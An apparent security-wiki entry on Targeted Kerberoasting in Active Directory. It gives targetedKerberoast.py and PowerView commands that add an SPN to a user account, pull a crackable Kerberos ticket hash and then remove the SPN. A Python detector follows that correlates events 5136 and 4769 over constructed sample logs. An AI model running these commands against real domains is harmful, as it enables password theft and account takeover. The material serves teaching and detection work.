Targeted Kerberoasting
This abuse can be carried out when controlling an object that has WriteProperty, GenericWrite or GenericAll over a target user (e.g. a member of the Account Operators group).
The attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting.
From UNIX-like systems, this can be done with targetedKerberoast.py (Python):

    targetedKerberoast.py -v -d $DOMAIN_FQDN -u $USER -p $PASSWORD
From Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module):

    # Make sure that the target account has no SPN
    Get-DomainUser 'victimuser' | Select serviceprincipalname

    # Set the SPN
    Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}

    # Obtain a kerberoast hash
    $User = Get-DomainUser 'victimuser'
    $User | Get-DomainSPNTicket | fl

    # Clear the SPNs of the target account
    $User | Select serviceprincipalname
    Set-DomainObject -Identity victimuser -Clear serviceprincipalname
Once the Kerberoast hash is obtained, it can possibly be cracked to recover the account's password if the password used is weak enough.
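Seen from the detection side, the sequence above (SPN set on a user account, service ticket requested, SPN cleared) leaves a recognizable trail. The following is an added example, not from the original page or its tools: it correlates Windows Security events 5136 and 4769 over constructed sample events. The dictionary field names are a hypothetical normalization and the 10-minute window is an assumed threshold.

```python
from datetime import datetime, timedelta

# Constructed sample events, reduced to hypothetical normalized fields.
# 5136 = directory service object modified, 4769 = Kerberos service ticket requested.
EVENTS = [
    {"id": 5136, "time": "2024-05-01T10:00:02", "actor": "opsuser", "class": "user",
     "target": "victimuser", "attr": "servicePrincipalName", "op": "added"},
    {"id": 4769, "time": "2024-05-01T10:00:05", "actor": "opsuser",
     "service": "victimuser", "etype": "0x17"},
    {"id": 5136, "time": "2024-05-01T10:00:09", "actor": "opsuser", "class": "user",
     "target": "victimuser", "attr": "servicePrincipalName", "op": "deleted"},
    # Benign: SPN registered on a service account, ticket requested hours later.
    {"id": 5136, "time": "2024-05-01T08:00:00", "actor": "admin1", "class": "user",
     "target": "svc_sql", "attr": "servicePrincipalName", "op": "added"},
    {"id": 4769, "time": "2024-05-01T11:30:00", "actor": "appuser",
     "service": "svc_sql", "etype": "0x12"},
]

def find_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Flag user accounts that get an SPN and a service ticket request within `window`."""
    recent_adds = {}   # account -> (time of SPN add, who added it)
    findings = {}      # account -> finding, updated if the SPN is removed again
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5136 and ev["class"] == "user" \
                and ev["attr"].lower() == "serviceprincipalname":
            account = ev["target"].lower()
            if ev["op"] == "added":
                recent_adds[account] = (ts, ev["actor"])
            elif account in findings and ts - findings[account]["spn_added"] <= window:
                findings[account]["spn_removed"] = True
        elif ev["id"] == 4769:
            account = ev["service"].lower()
            added = recent_adds.get(account)
            if added and ts - added[0] <= window and account not in findings:
                findings[account] = {
                    "account": account, "spn_added": added[0], "spn_added_by": added[1],
                    "ticket_requested_by": ev["actor"],
                    "rc4_ticket": ev["etype"].lower() == "0x17",
                    "spn_removed": False,
                }
    return list(findings.values())

if __name__ == "__main__":
    for finding in find_targeted_kerberoast(EVENTS):
        print(finding)
```

Event 5136 is only logged when Directory Service Changes auditing is enabled and the object's SACL covers the write.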